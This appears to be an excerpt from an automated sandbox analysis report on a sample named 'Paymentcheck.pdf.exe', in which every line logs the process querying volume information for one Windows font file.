Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
